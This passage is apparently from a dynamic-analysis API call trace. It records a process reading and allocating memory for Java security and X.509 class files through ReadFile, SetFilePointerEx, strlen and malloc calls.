lpOverlapped=0x0 | out: lpBuffer=0x208afa0*, lpNumberOfBytesRead=0x208af20*=0x1e, lpOverlapped=0x0) returned 1 [0107.381] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x6fe, lpNewFilePointer=0x208afb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afb0*=1790) returned 1 [0107.381] ReadFile (in: hFile=0x2cc, lpBuffer=0x208b0c0, nNumberOfBytesToRead=0x527, lpNumberOfBytesRead=0x208af80, lpOverlapped=0x0 | out: lpBuffer=0x208b0c0*, lpNumberOfBytesRead=0x208af80*=0x527, lpOverlapped=0x0) returned 1 [0107.382] strlen (_Str="sun/security/util/ManifestDigester.class") returned 0x28 [0107.382] malloc (_Size=0x48) returned 0x1228e5a0 [0107.383] malloc (_Size=0xa0) returned 0x12324120 [0107.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e3384, lpNewFilePointer=0x208c360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c360*=54408068) returned 1 [0107.383] ReadFile (in: hFile=0x134, lpBuffer=0x12324120, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c330, lpOverlapped=0x0 | out: lpBuffer=0x12324120*, lpNumberOfBytesRead=0x208c330*=0xa0, lpOverlapped=0x0) returned 1 [0107.383] malloc (_Size=0x29) returned 0x12298b40 [0107.398] strlen (_Str="sun/security/pkcs/PKCS7.class") returned 0x1d [0107.398] malloc (_Size=0x48) returned 0x1228e5f0 [0107.398] malloc (_Size=0xa0) returned 0x12324ac0 [0107.398] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33db642, lpNewFilePointer=0x208c2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2d0*=54376002) returned 1 [0107.398] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2a0, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208c2a0*=0xa0, lpOverlapped=0x0) returned 1 [0107.398] malloc (_Size=0x1e) returned 0x122fa6e0 [0107.913] strlen (_Str="sun/security/util/DerValue.class") returned 0x20 [0107.913] malloc (_Size=0x48) returned 0x1228ed20 [0107.913] malloc (_Size=0xa0) returned 0x12324cd0 [0107.913] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0842, lpNewFilePointer=0x208bfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfc0*=54462530) returned 1 [0107.913] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf90, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208bf90*=0xa0, lpOverlapped=0x0) returned 1 [0107.913] malloc (_Size=0x21) returned 0x122fa320 [0107.963] strlen (_Str="sun/security/x509/AlgorithmId.class") returned 0x23 [0107.964] malloc (_Size=0x48) returned 0x1228ea00 [0107.964] malloc (_Size=0xa0) returned 0x123245f0 [0107.964] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0b0c, lpNewFilePointer=0x208c0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0a0*=54463244) returned 1 [0107.964] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c070, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208c070*=0xa0, lpOverlapped=0x0) returned 1 [0107.964] malloc (_Size=0x24) returned 0x122fa080 [0107.971] strlen (_Str="java/security/cert/CertificateFactory.class") returned 0x2b [0107.971] malloc (_Size=0x48) returned 0x1228ea50 [0107.971] malloc (_Size=0xa0) returned 0x123246a0 [0107.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333350c, lpNewFilePointer=0x208bdf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdf0*=53687564) returned 1 [0107.971] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdc0, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208bdc0*=0xa0, lpOverlapped=0x0) returned 1 [0107.974] malloc (_Size=0x2c) returned 0x122989c0 [0107.978] strlen (_Str="sun/security/provider/X509Factory") returned 0x21 [0107.979] strlen (_Str="sun/security/provider/X509Factory.class") returned 0x27 [0107.979] malloc (_Size=0x48) returned 0x1228eff0 [0107.979] malloc (_Size=0xa0) returned 0x12324800 [0107.979] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dd5de, lpNewFilePointer=0x208c390, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c390*=54384094) returned 1 [0107.979] ReadFile (in: hFile=0x134, lpBuffer=0x12324800, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c360, lpOverlapped=0x0 | out: lpBuffer=0x12324800*, lpNumberOfBytesRead=0x208c360*=0xa0, lpOverlapped=0x0) returned 1 [0107.979] malloc (_Size=0x28) returned 0x122fa500 [0107.994] strlen (_Str="java/security/cert/X509Certificate.class") returned 0x28 [0107.994] malloc (_Size=0x48) returned 0x1228ed20 [0107.994] malloc (_Size=0xa0) returned 0x123245f0 [0107.994] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3333d25, lpNewFilePointer=0x208c0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0a0*=53689637) returned 1 [0107.994] ReadFile (in: hFile=0x134, lpBuffer=0x123245f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c070, lpOverlapped=0x0 | out: lpBuffer=0x123245f0*, lpNumberOfBytesRead=0x208c070*=0xa0, lpOverlapped=0x0) returned 1 [0107.994] malloc (_Size=0x29) returned 0x12298d00 [0108.015] strlen (_Str="sun/security/x509/X509CertInfo.class") returned 0x24 [0108.015] malloc (_Size=0x48) returned 0x1228e280 [0108.015] malloc (_Size=0xa0) returned 0x12324cd0 [0108.015] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5ca3, lpNewFilePointer=0x208bee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bee0*=54418595) returned 1 [0108.015] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208beb0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208beb0*=0xa0, lpOverlapped=0x0) returned 1 [0108.015] malloc (_Size=0x25) returned 0x122fa080 [0108.055] strlen (_Str="sun/security/x509/CertificateSerialNumber.class") returned 0x2f [0108.055] malloc (_Size=0x48) returned 0x1228ea00 [0108.055] malloc (_Size=0xa0) returned 0x12324280 [0108.055] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e497d, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=54413693) returned 1 [0108.055] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208bdd0*=0xa0, lpOverlapped=0x0) returned 1 [0108.055] malloc (_Size=0x30) returned 0x12298e00 [0108.077] strlen (_Str="sun/security/x509/X500Name.class") returned 0x20 [0108.077] malloc (_Size=0x48) returned 0x1228e230 [0108.078] malloc (_Size=0xa0) returned 0x12324ac0 [0108.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5aa3, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=54418083) returned 1 [0108.078] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208bdd0*=0xa0, lpOverlapped=0x0) returned 1 [0108.078] malloc (_Size=0x21) returned 0x122fa290 [0108.086] strlen (_Str="javax/security/auth/x500/X500Principal.class") returned 0x2c [0108.086] malloc (_Size=0x48) returned 0x1228e190 [0108.086] malloc (_Size=0xa0) returned 0x12324b70 [0108.086] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3367286, lpNewFilePointer=0x208ab70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ab70*=53899910) returned 1 [0108.086] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ab40, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208ab40*=0xa0, lpOverlapped=0x0) returned 1 [0108.087] malloc (_Size=0x2d) returned 0x12298580 [0108.098] strlen (_Str="sun/security/x509/RDN.class") returned 0x1b [0108.098] malloc (_Size=0x48) returned 0x1228ea00 [0108.098] malloc (_Size=0xa0) returned 0x12324750 [0108.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e56a3, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=54417059) returned 1 [0108.098] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208bce0*=0xa0, lpOverlapped=0x0) returned 1 [0108.098] malloc (_Size=0x1c) returned 0x122fa0b0 [0108.117] strlen (_Str="sun/security/x509/CertificateValidity.class") returned 0x2b [0108.117] malloc (_Size=0x48) returned 0x1228e230 [0108.117] malloc (_Size=0xa0) returned 0x123246a0 [0108.117] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4a36, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=54413878) returned 1 [0108.117] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208bdd0*=0xa0, lpOverlapped=0x0) returned 1 [0108.118] malloc (_Size=0x2c) returned 0x12298180 [0108.122] strlen (_Str="sun/util/calendar/CalendarSystem.class") returned 0x26 [0108.122] malloc (_Size=0x48) returned 0x1228ee60 [0108.122] malloc (_Size=0xa0) returned 0x12324280 [0108.122] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416ede, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=54619870) returned 1 [0108.122] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208b8a0*=0xa0, lpOverlapped=0x0) returned 1 [0108.124] malloc (_Size=0x27) returned 0x122fa470 [0108.137] strlen (_Str="sun/util/calendar/Gregorian$Date.class") returned 0x26 [0108.137] malloc (_Size=0x48) returned 0x1228ea00 [0108.137] malloc (_Size=0xa0) returned 0x12324e30 [0108.137] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3401340, lpNewFilePointer=0x208bac0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bac0*=54530880) returned 1 [0108.137] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba90, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208ba90*=0xa0, lpOverlapped=0x0) returned 1 [0108.137] malloc (_Size=0x27) returned 0x122fa0b0 [0108.150] strlen (_Str="sun/security/x509/CertificateX509Key.class") returned 0x2a [0108.150] malloc (_Size=0x48) returned 0x1228ea00 [0108.150] malloc (_Size=0xa0) returned 0x12324e30 [0108.150] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4ae7, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=54414055) returned 1 [0108.150] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208bdd0*=0xa0, lpOverlapped=0x0) returned 1 [0108.151] malloc (_Size=0x2b) returned 0x12298900 [0108.152] strlen (_Str="sun/security/x509/X509Key.class") returned 0x1f [0108.152] malloc (_Size=0x48) returned 0x1228f040 [0108.152] malloc (_Size=0xa0) returned 0x12324e30 [0108.153] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0f37, lpNewFilePointer=0x208bad0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bad0*=54464311) returned 1 [0108.153] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208baa0, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208baa0*=0xa0, lpOverlapped=0x0) returned 1 [0108.153] malloc (_Size=0x20) returned 0x122fa0b0 [0108.158] strlen (_Str="sun/security/util/BitArray.class") returned 0x20 [0108.158] malloc (_Size=0x48) returned 0x1228ea50 [0108.158] malloc (_Size=0xa0) returned 0x12324e30 [0108.158] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0a6e, lpNewFilePointer=0x208bc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc90*=54463086) returned 1 [0108.158] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc60, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208bc60*=0xa0, lpOverlapped=0x0) returned 1 [0108.158] malloc (_Size=0x21) returned 0x122fa320 [0108.161] strlen (_Str="java/security/spec/X509EncodedKeySpec.class") returned 0x2b [0108.161] malloc (_Size=0x48) returned 0x1228e190 [0108.161] malloc (_Size=0xa0) returned 0x12324a10 [0108.161] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3334984, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=53692804) returned 1 [0108.161] ReadFile (in: hFile=0x134, lpBuffer=0x12324a10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x12324a10*, lpNumberOfBytesRead=0x208bc40*=0xa0, lpOverlapped=0x0) returned 1 [0108.164] malloc (_Size=0x2c) returned 0x12299000 [0108.167] strlen (_Str="java/security/KeyFactory.class") returned 0x1e [0108.167] malloc (_Size=0x48) returned 0x1228ed20 [0108.167] malloc (_Size=0xa0) returned 0x12324280 [0108.167] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3331345, lpNewFilePointer=0x208b9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9b0*=53678917) returned 1 [0108.168] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b980, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208b980*=0xa0, lpOverlapped=0x0) returned 1 [0108.168] malloc (_Size=0x1f) returned 0x122fa140 [0108.171] strlen (_Str="sun/security/rsa/RSAKeyFactory") returned 0x1e [0108.171] strlen (_Str="sun/security/rsa/RSAKeyFactory.class") returned 0x24 [0108.171] malloc (_Size=0x48) returned 0x1228eaf0 [0108.171] malloc (_Size=0xa0) returned 0x12324750 [0108.171] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df35b, lpNewFilePointer=0x208bf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf50*=54391643) returned 1 [0108.172] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf20, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208bf20*=0xa0, lpOverlapped=0x0) returned 1 [0108.172] malloc (_Size=0x25) returned 0x122fa0b0 [0108.181] strlen (_Str="sun/security/rsa/RSAPublicKeyImpl.class") returned 0x27 [0108.182] malloc (_Size=0x48) returned 0x1228e5a0 [0108.182] malloc (_Size=0xa0) returned 0x12324330 [0108.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df503, lpNewFilePointer=0x208bb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb20*=54392067) returned 1 [0108.182] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208baf0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208baf0*=0xa0, lpOverlapped=0x0) returned 1 [0108.182] malloc (_Size=0x28) returned 0x122fa320 [0108.191] strlen (_Str="sun/security/x509/CertificateExtensions.class") returned 0x2d [0108.191] malloc (_Size=0x48) returned 0x1228f090 [0108.191] malloc (_Size=0xa0) returned 0x12324960 [0108.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e46f8, lpNewFilePointer=0x208be00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be00*=54413048) returned 1 [0108.191] ReadFile (in: hFile=0x134, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdd0, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208bdd0*=0xa0, lpOverlapped=0x0) returned 1 [0108.191] malloc (_Size=0x2e) returned 0x12298d00 [0108.241] strlen (_Str="sun/security/x509/OIDMap.class") returned 0x1e [0108.241] malloc (_Size=0x48) returned 0x1228e5a0 [0108.241] malloc (_Size=0xa0) returned 0x123243e0 [0108.241] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e53f5, lpNewFilePointer=0x208b9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9e0*=54416373) returned 1 [0108.241] ReadFile (in: hFile=0x134, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b9b0, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208b9b0*=0xa0, lpOverlapped=0x0) returned 1 [0108.241] malloc (_Size=0x1f) returned 0x122fa4d0 [0108.248] strlen (_Str="sun/security/x509/NetscapeCertTypeExtension") returned 0x2b [0108.248] strlen (_Str="sun/security/x509/NetscapeCertTypeExtension.class") returned 0x31 [0108.248] malloc (_Size=0x48) returned 0x1228e5a0 [0108.248] malloc (_Size=0xa0) returned 0x12324280 [0108.248] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e52e8, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54416104) returned 1 [0108.248] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.248] malloc (_Size=0x32) returned 0x12298840 [0108.256] strlen (_Str="java/util/TreeMap$Entry.class") returned 0x1d [0108.257] malloc (_Size=0x48) returned 0x1228ea50 [0108.257] malloc (_Size=0xa0) returned 0x12324e30 [0108.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418fd3, lpNewFilePointer=0x208bb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb80*=54628307) returned 1 [0108.257] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb50, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208bb50*=0xa0, lpOverlapped=0x0) returned 1 [0108.258] malloc (_Size=0x1e) returned 0x122fa140 [0108.261] strlen (_Str="sun/security/x509/KeyUsageExtension") returned 0x23 [0108.262] strlen (_Str="sun/security/x509/KeyUsageExtension.class") returned 0x29 [0108.262] malloc (_Size=0x48) returned 0x1228ef00 [0108.262] malloc (_Size=0xa0) returned 0x12324750 [0108.262] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e51cb, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54415819) returned 1 [0108.262] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.263] malloc (_Size=0x2a) returned 0x12298800 [0108.269] strlen (_Str="sun/security/x509/SubjectKeyIdentifierExtension") returned 0x2f [0108.270] strlen (_Str="sun/security/x509/SubjectKeyIdentifierExtension.class") returned 0x35 [0108.270] malloc (_Size=0x48) returned 0x1228eff0 [0108.270] malloc (_Size=0xa0) returned 0x12324cd0 [0108.270] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e58a4, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54417572) returned 1 [0108.270] ReadFile (in: hFile=0x134, lpBuffer=0x12324cd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12324cd0*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.271] malloc (_Size=0x36) returned 0x12298a00 [0108.275] strlen (_Str="sun/security/x509/KeyIdentifier.class") returned 0x25 [0108.275] malloc (_Size=0x48) returned 0x1228f040 [0108.275] malloc (_Size=0xa0) returned 0x12324800 [0108.275] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5178, lpNewFilePointer=0x208b460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b460*=54415736) returned 1 [0108.275] ReadFile (in: hFile=0x134, lpBuffer=0x12324800, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b430, lpOverlapped=0x0 | out: lpBuffer=0x12324800*, lpNumberOfBytesRead=0x208b430*=0xa0, lpOverlapped=0x0) returned 1 [0108.275] malloc (_Size=0x26) returned 0x122fa140 [0108.276] strlen (_Str="sun/security/x509/AuthorityKeyIdentifierExtension") returned 0x31 [0108.277] strlen (_Str="sun/security/x509/AuthorityKeyIdentifierExtension.class") returned 0x37 [0108.277] malloc (_Size=0x48) returned 0x1228e230 [0108.277] malloc (_Size=0xa0) returned 0x123246a0 [0108.277] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4375, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54412149) returned 1 [0108.277] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.277] malloc (_Size=0x38) returned 0x12299080 [0108.280] strlen (_Str="sun/security/x509/GeneralNames.class") returned 0x24 [0108.280] malloc (_Size=0x48) returned 0x1228e280 [0108.280] malloc (_Size=0xa0) returned 0x12324a10 [0108.280] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4ea3, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=54415011) returned 1 [0108.280] ReadFile (in: hFile=0x134, lpBuffer=0x12324a10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x12324a10*, lpNumberOfBytesRead=0x208bf50*=0xa0, lpOverlapped=0x0) returned 1 [0108.280] malloc (_Size=0x25) returned 0x122fa140 [0108.284] strlen (_Str="sun/security/x509/SubjectAlternativeNameExtension") returned 0x31 [0108.284] strlen (_Str="sun/security/x509/SubjectAlternativeNameExtension.class") returned 0x37 [0108.284] malloc (_Size=0x48) returned 0x1228e5a0 [0108.284] malloc (_Size=0xa0) returned 0x12324b70 [0108.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e57df, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54417375) returned 1 [0108.284] ReadFile (in: hFile=0x134, lpBuffer=0x12324b70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12324b70*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.284] malloc (_Size=0x38) returned 0x12298cc0 [0108.291] strlen (_Str="sun/security/x509/GeneralName.class") returned 0x23 [0108.291] malloc (_Size=0x48) returned 0x1228ed20 [0108.291] malloc (_Size=0xa0) returned 0x12324280 [0108.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4df8, lpNewFilePointer=0x208b3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3f0*=54414840) returned 1 [0108.291] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b3c0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208b3c0*=0xa0, lpOverlapped=0x0) returned 1 [0108.291] malloc (_Size=0x24) returned 0x122fa140 [0108.299] strlen (_Str="sun/security/x509/X509AttributeName.class") returned 0x29 [0108.299] malloc (_Size=0x48) returned 0x1228ea50 [0108.299] malloc (_Size=0xa0) returned 0x12324280 [0108.299] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5af1, lpNewFilePointer=0x208be70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be70*=54418161) returned 1 [0108.300] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be40, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208be40*=0xa0, lpOverlapped=0x0) returned 1 [0108.300] malloc (_Size=0x2a) returned 0x12298ec0 [0108.312] strlen (_Str="java/security/AlgorithmParameters.class") returned 0x27 [0108.312] malloc (_Size=0x48) returned 0x1228e6e0 [0108.312] malloc (_Size=0xa0) returned 0x12324750 [0108.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33effe8, lpNewFilePointer=0x208b910, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b910*=54460392) returned 1 [0108.313] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b8e0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208b8e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.313] malloc (_Size=0x28) returned 0x122fa140 [0108.315] strlen (_Str="java/security/AlgorithmParametersSpi") returned 0x24 [0108.315] strlen (_Str="java/security/AlgorithmParametersSpi.class") returned 0x2a [0108.315] malloc (_Size=0x48) returned 0x1228ea50 [0108.315] malloc (_Size=0xa0) returned 0x12324a10 [0108.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33eff90, lpNewFilePointer=0x208bfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfc0*=54460304) returned 1 [0108.315] ReadFile (in: hFile=0x134, lpBuffer=0x12324a10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf90, lpOverlapped=0x0 | out: lpBuffer=0x12324a10*, lpNumberOfBytesRead=0x208bf90*=0xa0, lpOverlapped=0x0) returned 1 [0108.315] malloc (_Size=0x2b) returned 0x122983c0 [0108.316] strlen (_Str="sun/security/provider/DSAParameters") returned 0x23 [0108.316] strlen (_Str="sun/security/provider/DSAParameters.class") returned 0x29 [0108.316] malloc (_Size=0x48) returned 0x1228ed20 [0108.316] malloc (_Size=0xa0) returned 0x12324960 [0108.316] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efbe5, lpNewFilePointer=0x208be40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be40*=54459365) returned 1 [0108.317] ReadFile (in: hFile=0x134, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be10, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208be10*=0xa0, lpOverlapped=0x0) returned 1 [0108.317] malloc (_Size=0x2a) returned 0x12298800 [0108.365] strlen (_Str="sun/security/provider/DSAKeyFactory") returned 0x23 [0108.366] strlen (_Str="sun/security/provider/DSAKeyFactory.class") returned 0x29 [0108.366] malloc (_Size=0x48) returned 0x1228ee10 [0108.366] malloc (_Size=0xa0) returned 0x12324540 [0108.366] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dbd1b, lpNewFilePointer=0x208bf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf50*=54377755) returned 1 [0108.366] ReadFile (in: hFile=0x134, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bf20, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208bf20*=0xa0, lpOverlapped=0x0) returned 1 [0108.366] malloc (_Size=0x2a) returned 0x12298900 [0108.367] strcpy (in: _Dest=0x208c0d0, 